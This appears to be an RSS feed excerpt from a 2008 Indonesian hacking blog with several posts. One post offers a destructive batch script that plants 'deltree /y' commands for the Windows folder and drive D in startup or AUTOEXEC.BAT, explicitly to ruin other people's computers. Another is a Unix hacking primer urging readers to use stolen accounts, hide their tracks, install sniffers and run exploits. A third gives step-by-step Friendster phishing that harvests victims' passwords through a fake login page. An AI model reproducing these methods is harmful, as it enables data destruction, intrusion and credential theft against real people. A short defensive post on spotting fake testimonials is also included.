href="http://feeds.wordpress.com/1.0/godigg/koock.wordpress.com/131/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/koock.wordpress.com/131/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/koock.wordpress.com/131/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/koock.wordpress.com/131/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=131&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://koock.wordpress.com/2008/12/18/friendster-layer-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/971d714542fe8c92c45aad3bd99da84b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">koock</media:title>
		</media:content>

		<media:content url="http://foto-foto.com/introvertster.jpg" medium="image" />

		<media:content url="http://koock.files.wordpress.com/2008/12/friendsterlayerinjection.jpg" medium="image">
			<media:title type="html">friendsterlayerinjection</media:title>
		</media:content>
	</item>
		<item>
		<title>Program Perusak Sang LAMER. by_anjar</title>
		<link>http://koock.wordpress.com/2008/12/18/program-perusak-sang-lamer/</link>
		<comments>http://koock.wordpress.com/2008/12/18/program-perusak-sang-lamer/#comments</comments>
		<pubDate>Thu, 18 Dec 2008 02:58:02 +0000</pubDate>
		<dc:creator>koock</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://koock.wordpress.com/2008/12/18/program-perusak-sang-lamer/</guid>
		<description><![CDATA[Ini khusus buat para &#8220;Lamer sejati&#8221; yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!! Okay, ngga&#8217; usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat: @echo off echo deltree /y %windir%\*.*&#62;&#62; %windir%\programs\startm~1\programs\startup\lamer.bat echo deltree /y d:\*.*&#62;&#62; %windir%\programs\startm~1\programs\startup\lamer.bat atau [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=128&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[
<p>Ini khusus buat para &#8220;Lamer sejati&#8221; yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!</p>
<p>Okay, ngga&#8217; usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat:<span id="more-128"></span></p>
<p>@echo off</p>
<p>echo deltree /y %windir%\*.*&gt;&gt; %windir%\programs\startm~1\programs\startup\lamer.bat</p>
<p>echo deltree /y d:\*.*&gt;&gt; %windir%\programs\startm~1\programs\startup\lamer.bat</p>
<p>atau</p>
<p>@echo off</p>
<p>echo deltree /y %windir%\*.*&gt;&gt; AUTOEXEC.BAT</p>
<p>echo deltree /y d:\*.*&gt;&gt; AUTOEXEC.BAT</p>
<p>wELL, ga&#8217; perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi&#8230; program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.</p>
<p>/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;|EOF|&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; */</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/koock.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/koock.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/koock.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/koock.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/koock.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/koock.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/koock.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/koock.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/koock.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/koock.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/koock.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/koock.wordpress.com/128/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/koock.wordpress.com/128/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/koock.wordpress.com/128/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=128&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://koock.wordpress.com/2008/12/18/program-perusak-sang-lamer/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/971d714542fe8c92c45aad3bd99da84b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">koock</media:title>
		</media:content>
	</item>
		<item>
		<title>Hacker UNIX.by_anjar</title>
		<link>http://koock.wordpress.com/2008/12/07/hacker-unixby_anjar/</link>
		<comments>http://koock.wordpress.com/2008/12/07/hacker-unixby_anjar/#comments</comments>
		<pubDate>Sun, 07 Dec 2008 07:39:38 +0000</pubDate>
		<dc:creator>koock</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://koock.wordpress.com/2008/12/07/hacker-unixby_anjar/</guid>
		<description><![CDATA[Jadi kamu memutuskan untuk menjadi seorang hacker UNIX tapi kami nggak tau gimana mulainya? Sebelum kamu benar-benar mulai, pastikan bahwa hal-hal berikut ini adalah jelas: 1. Hacking adalah kerja keras. Hacking bukanlah tempat bermain anak-anak yang hanya ingin mendapat 15 menit secara cuma-cuma. Kamu harus belajar bagaimana caranya mengoperasikan dan memprogram sebuah system. Kamu mesti [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=126&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Jadi kamu memutuskan untuk menjadi seorang hacker UNIX tapi kami nggak tau gimana mulainya? Sebelum kamu benar-benar mulai, pastikan bahwa hal-hal berikut ini adalah jelas: </p>
<p>1. Hacking adalah kerja keras. Hacking bukanlah tempat bermain anak-anak yang hanya ingin mendapat 15 menit secara cuma-cuma. Kamu harus belajar bagaimana caranya mengoperasikan dan memprogram sebuah system. Kamu mesti ngeriset bagaimana mesin-mesin bereaksi dan membaca kode-kode asli. Ini adalah proses yang panjang dan sukar &#8211; inilah peringatan untuk kamu!<span id="more-126"></span><br />
2. Hacking adalah ilegal. Masuk ke jaringan komputer tanpa izin adalah ilegal, paling tidak di banyak negara (hanya Belanda dan Argentina kalo nggak salah yang belum punya hukum mengenai hacking. Belum aja, sih &#8230; paling juga nanti akan ada.) Walaupun hanya log-on ke sebuah sustem dengan menggunakan account bukan milikmu adalah tindakan pidana yang bisa dikenakan hukuman. Sekali sang hakim menjatuhkan hukuman, maka hukuman tersebut akan dimasukkan ke data hidup / arsip kamu. Seluruh hidup kamu mungkin bisa terlantar karena hanya sedikit perusahaan yang bersedia menerima hacker sebagai karyawan. Ini serius. Apalagi di Indonesia. Jika kamu meng-hacking server milik pemerintah, bisa dijamin kamu akan amblas. Dan keluarga kamu nggak aman! Beberapa anggota kami nggak bisa balik lagi ke tanah air karena sudah dicekal, dan terakhir, pemerintah mulai menyelidiki asal-usul ChiKo dan mencari keluarganya di Indonesia.<br />
3. Hacking memerlukan banyak waktu. Kamu nggak mungkin cuman nge-hack selama setengah thun, terus berhenti dan istirahat selama tiga bulan, lalu kembali lagi. Waktu berjalan cepat di internet. Rilis baru UNIX, bug-bug baru, dan juga fix-fix nya. Sekali kamu ketinggalan jaman dengan eksploit data milikmu, kamu mesti mengemis-ngemis ke orang lain untuk memberikan barang-barang baru kepadamu, dan jika kamu melakukan hal tsb terlalu sering, mereka nggak akan begitu senang jadinya. 50% dari waktu hacking sebenarnya dihabiskan untuk mengumpulkan informasi. Bicaralah ke hacker-hacker lainnya, baca mailing lists dan newsgroups, jangan lupa situs-situs www dan ftp yang bagus.<br />
Tapi apa motivasi kamu untuk secara benar-benar melakukan &#8216;unix hacking&#8217;? Itu terserah kamu. Kamu ingin menjadi salah satunya, maka pikirkan lagi mengapa kamu ingin menjadi salah satu unix hacker. Lupakan film-film seperti &#8220;The Net&#8221; ataupun &#8220;Hackers&#8221; &#8211; film-film tsb BUKANLAH realita! Lupakan mimpi-mimpi menjadi pahlawan, mengehack Pentagon atau HanKam dan menjadi cowok terseksi, mendapat pacar-pacar yang cantik dan pada akhirnya bekerja untuk sebuah perusahaan keamanan sistem dengan gaji berjibun ;o). Hal-hal tersebut BUKANLAH apa yang akan terjadi &#8211; jadi, pastikanlah bahwa alasan kamu jelas, mengapa kamu ingin menjadi hacker dan apa yang kamu harapkan dari hacking. Bisakah kamu bayangkan ibundamu tercinta, tersedu-sedu saat polisi datang untuk menahanmu?<br />
Ingatlah peringatan-peringatan ini. Ini kami jadikan peringatan untuk memastikan bahwa kamu menyadari apa yang kamu lakukan dan kamu ingin menjadi apa. Catatan juga bahwa kami menulis petunjuk singkat ini sebab seringkali kami mendapat pertanyaan dari banyak orang, &#8220;Gimana caranya supaya gue jadi jago nge-hack UNIX?&#8221; &#8211; dan dari waktu ke waktu kami menjadi makin cape ngejawabinnya. Maka &#8230; inilah dia jawaban-jawabannya. Jangan salahkan kami atas ketidaklengkapan ataupun kesalahan- kami udah nggak peduli lagi dengan permintaan-permintaan ngajarin nge-hack lewat jalan potong. Hanya yang paling tahan bantinglah yang bertahan &#8211; jadi, cobalah mendapatkan sebanyak mungkin melalui teks ini jika kamu benar-benar masih pemula. Kami sendiri masih belum pantas menyandang gelar &#8220;hacker&#8221; karena kami merasa masih jauh sekali tertinggal oleh rekan-rekan kebangsaan lain dan kami masih selalu dalam proses mempelajari segalanya.<br />
Gimana cara mulainya?<br />
1. Kenalilah sang sistem &#8211; atau &#8211; gimana caranya kamu bisa menang rodeo tanpa belajar caranya menunggang kuda?<br />
2. Dapatkan distribusi unix. Cobalah mendapatkan Linux, FreeBSD, Solaris, Sinix dll. untuk PC kamu. Linux dan FreeBSD adalah sistem-sistem murah (kadang-kadang gratis!) yang berasal dari BSD, sedangkan Solaris dan Sinix adalah sistem-sistem mahal yang berasal dari System V. Tip: Carilah distribusi linux yang punya buku pegangan yang cukup bagus. Kamu mesti mempelajari bagaimana caranya mengoperasikan unix. Pelajarilah dasar-dasarnya, seperti mengganti direktori, perintah-perintah menyalin dan menghapus dan menggunakan program penyunting.<br />
3. Motivasi dirimu sendiri untuk secara benar-benar menggunakan UNIX. Gimana caranya memotivasi &#8211; itu terserah kamu sendiri. Mungkin dengan menggunakan databasi yang ada di distribusi unix kamu, membuat program dalam C untuk sekolah/universitas kamu, apa aja lah, yang jelas kamu mesti benar-benar menggunakan unix (seperti jamannya ngetik perintah di DOS dulu).<br />
4. Beli beberapa buku untuk menolong kamu. Diluar sana ada banyak, jadi, pergilah ke toko buku terkemuka, paling bagus didekat sebuah universitas, dimana banyak orang-orang yang bisa menolong memberitahukan buku-buku apa yang cukup baik mengenai unix. Buku-buku Nutshell terbitan O&#8217;reilly (dan terjemahannya) kami sukai, namun ini adalah opini pribadi. Kamu mungkin mau mulai dengan seri For Dummies terbitan IDG (banyak yang bahasa Indonesianya. Baca FAQ untuk judul-judul lain.<br />
5. Dapatkan internet account dengan PPP dan/atau akses shell (hubungi ISPmu). JANGAN SEKALI-KALI menge-hack atau bertukar informasi mengenai hacking (tanpa PGP) dengan menggunakan account milik kamu sendiri (atau account dibawah nama/alamat/telepon kamu!). Coba untuk mengkonfigurasikan PC unix kamu untuk menghubungkan diri ke Internet provider. Beberapa distribusi Linux dilengkapi dengan sebuah buku petunjuk dimana mereka menggambarkan gimana caranya untuk menyambungkan ke internet. Jika kamu sudah mengikuti 5 langkah tsb diatas dan mengetahui caranya mengoperasikan unix (ini akan makan waktu sekitar 2 &#8211; 8 minggu) maka kamu sebaiknya melanjutkan ke langkah berikutnya:</p>
<p>Pelajari Dasar-Dasarnya!</p>
<p>6. Kembalilah ke toko buku, kali ini carilah buku-buku mengenai unix dan keamanan internet. Beberapa buku terbitan Elex Media membahas hal ini. Buku-buku berbahasa inggris antara lain &#8220;Practical Unix Security&#8221; oleh Garfinkel and Spafford. Pelajari masalah-masalah keamanan dasar, &#8216;holes&#8217; dan ciri-ciri apa yang ada di unix, dan kesalahan-kesalahan apa yang sering orang-orang lakukan.<br />
7. Cobalah untuk mendapatkan semua informasi dan file-file yang kamu bisa temukan di internet. Selidiki situs-situs www dan ftp dan gunakan mesin pencari. Berlangganlah ke mailing list mengenai keamanan yang cukup penting dan bacalah newsgroups yang mungkin bisa jadi penting. Tanya-tanya di sekeliling di IRC mengenai situs-situs yang bagus. berikut adalah situs-situs untuk permulaan:</p>
<p>http://wks.uts.ohio-state.edu/unix_course/unix.html<br />
http://www.mcsr.olemiss.edu/unixhelp/</p>
<p>8. Baca dan analisa file-file hasil kumpulan kamu &#8211; dan jangan cuman dikumpulin aja. Jika kata-kata seperti suid, buffer overflow, firewall, rdist, nis, nfs, dan SATAN sudah menjadi bukan rahasia lagi bagi kamu dan kamu benar-benar mengetahui apa makna dan konsekwensi kata-kata tersebut, &#8230;lanjutkan.</p>
<p>Mulai Hacking</p>
<p>9. Dapatkan sebuah account yang bukan milikmu! Coba minta dari hacker yang kamu kenal/jumpai. Atau gunakan metode-metode yang ada di FAQ. Ingatlah: jangan coba-coba nge-hack dari account milik kamu sendiri!<br />
10. Dengan account ini kamu bisa mencoba untuk menge-hack sistem pertamamu. Coba eksploit-eksploitmu. Tapi ingatlah untuk selalu untuk menutupi jejak (artikel akan segera menyusul) supaya account ilegal milikmu tidak menjadi sejarah setelah baru sekali dipakai!<br />
11. Gunakan ypx, eksploit &#8211; eksploit remote sendmail, insecure NFS exports, dll untuk mendapatkan host-host lainnya. Kamu bisa menjadi benar-benar sukses dengan barang &#8220;lama&#8221; ini jika kamu menggunakan daftar host yang cukup besar dan skrip tulis/temukan (write/find) yang mengotomatisasi proses penge-test-an untuk kamu. Tapi dimana bisa ditemukan nama-nama host untuk membuat daftar host? Banyak kemungkinan. Coba irc, /etc/hosts, www, data analisis statistik dari akses-akses internet atau www, dll. Ini akan memberikan kamu banyak host dengan account-account yang ada.<br />
12. Instal sebuah sniffer jika keadaan sistem memungkinkan dan kamu membobol account &#8216;root&#8217;! Account ini akan memperbolehkan kamu mengakses banyak account ke host-host baru. Jalankan skrip-skrip eksploit kamu. pada akhirnya paling tidak ada beberapa yang bisa digunakan. Lanjutkanlah. </p>
<p>Menjadi seorang Hacker</p>
<p>APA? Kamu udah berhasil nge-hack root di beberapa sistem &#8211; dan kamu masih belum juga seorang &#8220;hacker&#8221;? Kenapa tuh? Seorang hacker bukanlah seseorang yang kerjanya menge-hack sebuah site, install sebuah sniffer dan selanjutnya. Seorang hacker asli adalah seseorang yang ingin mengerti sebuah sistem, mengetahui bagaimana sang sistem bereaksi, bersenang-senang mengambil alih kekuasaan di server tersebut dan tertarik dalam menemukan bugs-bugs baru dan mengarang program-program kegunaan (tool utility) baru. Yang cocok digambarkan diatas bisa dipanggil Columbus-nya Cyberspace.<br />
13. Cobalah untuk berhubungan dengan hacker-hacker lainnya dan saling bertukar informasi, pengalaman, accounts, eksploits, dan file.<br />
14. Amati diskusi-diskusi di newsgroups, mailing lists, dan irc. Cobalah membaca RFC-RFC penting, pelajarilah C dan mulailah memprogram tools karyamu sendiri.<br />
15. Jangan kut-ikutan menjadi &#8220;31337&#8243; &#8211; kamu sendiri tahu bahwa kamu udah cukup keren hackingnya (&#8220;cool&#8221;, gitu, bahasa Sunda-nya mah!) dan kamu nggak perlu untuk meyakinkan setiap orang bahwa kamu emang elit. Bertindaklah secara normal dan tolonglah orang-orang lain yang sekarang bertanya-tanya kepada kamu &#8220;gimana caranya supaya gue bisa nge-hack UNIX?&#8221;<br />
16. Jangan lelah. Tetaplah bertahan di kawasan per-hacking-an, selalu amati newsgroup dan mailing list dan teman teman, jangan berhenti ber-hacking ria.<br />
Yah, segitulah dari kami, kawan-kawan, teks diatas kayaknya cukup untuk membuat para pendatang baru tersedak mulutnya. Teks tsb emang singkat dan kotor, namun mempunyai apa yang diperlukan.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/koock.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/koock.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/koock.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/koock.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/koock.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/koock.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/koock.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/koock.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/koock.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/koock.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/koock.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/koock.wordpress.com/126/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/koock.wordpress.com/126/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/koock.wordpress.com/126/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=126&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://koock.wordpress.com/2008/12/07/hacker-unixby_anjar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/971d714542fe8c92c45aad3bd99da84b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">koock</media:title>
		</media:content>
	</item>
		<item>
		<title>Cara Paling Mudah Menghindari Hacking Friendster By Tarecha</title>
		<link>http://koock.wordpress.com/2008/11/27/cara-paling-mudah-menghindari-hacking-friendster-by-tarecha/</link>
		<comments>http://koock.wordpress.com/2008/11/27/cara-paling-mudah-menghindari-hacking-friendster-by-tarecha/#comments</comments>
		<pubDate>Thu, 27 Nov 2008 01:48:01 +0000</pubDate>
		<dc:creator>koock</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://koock.wordpress.com/?p=124</guid>
		<description><![CDATA[Gampang Kug Caranya, gak usah punya fs&#8230; wk wk wk<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=124&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Gampang Kug Caranya,<br />
gak usah punya fs&#8230;</p>
<p>wk wk wk</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/koock.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/koock.wordpress.com/124/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/koock.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/koock.wordpress.com/124/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/koock.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/koock.wordpress.com/124/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/koock.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/koock.wordpress.com/124/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/koock.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/koock.wordpress.com/124/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/koock.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/koock.wordpress.com/124/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/koock.wordpress.com/124/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/koock.wordpress.com/124/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=124&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://koock.wordpress.com/2008/11/27/cara-paling-mudah-menghindari-hacking-friendster-by-tarecha/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/971d714542fe8c92c45aad3bd99da84b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">koock</media:title>
		</media:content>
	</item>
		<item>
		<title>Teknik Lain : Hack Password Friendster.by_anjar</title>
		<link>http://koock.wordpress.com/2008/11/23/teknik-lain-hack-password-friendsterby_anjar/</link>
		<comments>http://koock.wordpress.com/2008/11/23/teknik-lain-hack-password-friendsterby_anjar/#comments</comments>
		<pubDate>Sun, 23 Nov 2008 08:18:46 +0000</pubDate>
		<dc:creator>koock</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[hack]]></category>

		<guid isPermaLink="false">http://koock.wordpress.com/?p=122</guid>
		<description><![CDATA[Hi… sudah lama enggak menulis. Kali ini saya akan menerangkan cara mendapatkan password Account Friendster. Tidak usah susah payah membuat testimonial redirect dan meng-upload halaman php tipuan atau apalah. Lagipula bug itu sudah di-patch oleh pengelolanya . Oke kali ini teknik dari blognya mas Sepri. Sampai saat tulisan ini dibuat teknik ini masih bisa dilakukan [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=122&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div class="snap_preview">
<p>Hi… sudah lama enggak menulis. Kali ini saya akan menerangkan cara mendapatkan password Account Friendster. Tidak usah susah payah membuat testimonial redirect dan meng-upload halaman php tipuan atau apalah. Lagipula bug itu sudah di-patch oleh pengelolanya <img src='http://s2.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> . Oke kali ini teknik dari blognya mas Sepri. Sampai saat tulisan ini dibuat teknik ini masih bisa dilakukan dan katanya 10000% berjalan <img src="http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif" alt=")" class="wp-smiley"> <span id="more-122"></span><span></span></p>
<p>Begini langkah-langkahnya :</p>
<p>1. Download Script-nya mas Sepri di <a href="http://www.fileden.com/files/2007/2/9/751731/Serangan%20Maut.doc">LINK INI</a></p>
<p>2. Buka pakai Word atau Wordpad biar yg ia tandai bisa terlihat</p>
<p>3. Kalian cukup ganti Nomor yang dia tandai BIRU<br />
Ganti pakai nomor ID kamu di FS. Cara liatnya? Gampang…<br />
Tingall logout dari Account FS kalian. Lalu masuk ke URL halaman FS kamu tanpa Login. Nanti di Address Box ada tulisan kayak gini : http://www.friendster.com/%USER ID KAMU%.</p>
<p>Misalnya User ID-nya adalah <strong>16419975</strong> maka kalimatnya adalah <strong>http://www.friendster.com/16419975</strong>.</p>
<p>Copy user ID (angka-angkanya aja) FS kamu dan gantikan angka-angka yang ditandai biru di Script tersebut dengan User ID FS yang sudah di-copy.</p>
<p>4. Buka <a href="http://www.markyctrigger.com/OGstandard.html?KeepThis=true&amp;TB_iframe=true&amp;height=400&amp;width=600">LINK INI</a></p>
<p>5. Copy kode yang dari Script yang udah di rubah ke bagian atas</p>
<p>6. Tekan GENERATE</p>
<p>7. Copy code yang bawah</p>
<p>8. Paste di MEDIA BOX halaman FS kamu.</p>
<p>Selesai</p>
<p><em><strong>Cara kerjanya adalah :</strong></em></p>
<p>Sang korban melihat profile kita terus dalam hitungan menit<br />
profile tersebut berubah menjadi tampilan log-in<br />
dan bagi yang ga merhatikan mungkin ini login asli soalnya masih<br />
dalam address friendster…….</p>
<p>Padahal ini adalah halaman send message yang ia rubah menjadi halaman log-in. Jadi kalau diisi tuh Korban secara otomatis kirim message ke kita dan kita ga perlu report2 bikin php atau apalah<br />
nah kenapa saya suruh ganti nomor ID FS tersebut soalnya itu adalah nomor ID mas Sepri jadi kalau ga dirubah<br />
maka pesannya akan masuk ke FS mas Sepri huehuehueh…..</p>
<p>Kode ini hanya berlaku untuk mencuri Password FS yang sudah di generate emailnya dan bagi yang belum digenerate selamatlah anda……</p>
</div>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/koock.wordpress.com/122/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/koock.wordpress.com/122/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/koock.wordpress.com/122/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/koock.wordpress.com/122/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/koock.wordpress.com/122/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/koock.wordpress.com/122/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/koock.wordpress.com/122/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/koock.wordpress.com/122/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/koock.wordpress.com/122/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/koock.wordpress.com/122/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/koock.wordpress.com/122/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/koock.wordpress.com/122/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/koock.wordpress.com/122/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/koock.wordpress.com/122/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=122&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://koock.wordpress.com/2008/11/23/teknik-lain-hack-password-friendsterby_anjar/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/971d714542fe8c92c45aad3bd99da84b?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">koock</media:title>
		</media:content>

		<media:content url="http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif" medium="image">
			<media:title type="html">)</media:title>
		</media:content>
	</item>
		<item>
		<title>teknik melindungi FS dari tangan2 jahil.by_anjar</title>
		<link>http://koock.wordpress.com/2008/11/16/teknik-melindungi-fs-dari-tangan2-jahilby_anjar/</link>
		<comments>http://koock.wordpress.com/2008/11/16/teknik-melindungi-fs-dari-tangan2-jahilby_anjar/#comments</comments>
		<pubDate>Sun, 16 Nov 2008 05:25:36 +0000</pubDate>
		<dc:creator>koock</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://koock.wordpress.com/?p=106</guid>
		<description><![CDATA[helo2 kawan2 smua aq mo bagi2 info nih semakin hari kayaknya yang namanya hack fs makin banyak dan makin rame kan para hacker2 memanfaatkan yang namanya testiomonally untuk hack fs kalian smua gini nih cara nglindungin FS dari para hacker2 yang suka jahil.sebenarnya mereka bukan hacker tapi memanfaatkan softaware hacker.heheh2X 1.klo testi di aprove dan [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=koock.wordpress.com&amp;blog=4281142&amp;post=106&amp;subd=koock&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>helo2 kawan2 smua</p>
<p>aq mo bagi2 info nih<br />
semakin hari kayaknya yang namanya hack fs makin banyak dan makin rame kan<br />
para hacker2 memanfaatkan yang namanya testiomonally untuk hack fs kalian smua<br />
gini nih cara nglindungin FS dari para hacker2 yang suka jahil.sebenarnya mereka bukan hacker tapi memanfaatkan softaware hacker.heheh2X<span id="more-106"></span><br />
1.klo testi di aprove dan kalian kembali lagi ke menu login mendingan tutup aja deh halaman web friendster itu karena itu bukan merupakan halaman fs yang asli ato itu bisa dibilang palsu deh.solusinya klo dah gini km buka aja halaman baru friendster.<br />
2.sebelum kamu aprove tu testi mendingan di copy dulu ke notepad ato ke PM an YM ato di mIRC klo isinya dan paste-an isi yang kamu copy tadi ga sama delete aja tuh testi daripada kena hack pusing juga nanti.<br />
3.Klo emang udah pernah ngalamin hal itu mending liat aja deh daftar2 FS yang dah kena hack disini kali aja fs kamu ada disana segera ganti pasword klo emang udah masuk ke daftar2 FS yang dah kena hack.coba lihat disini</p>
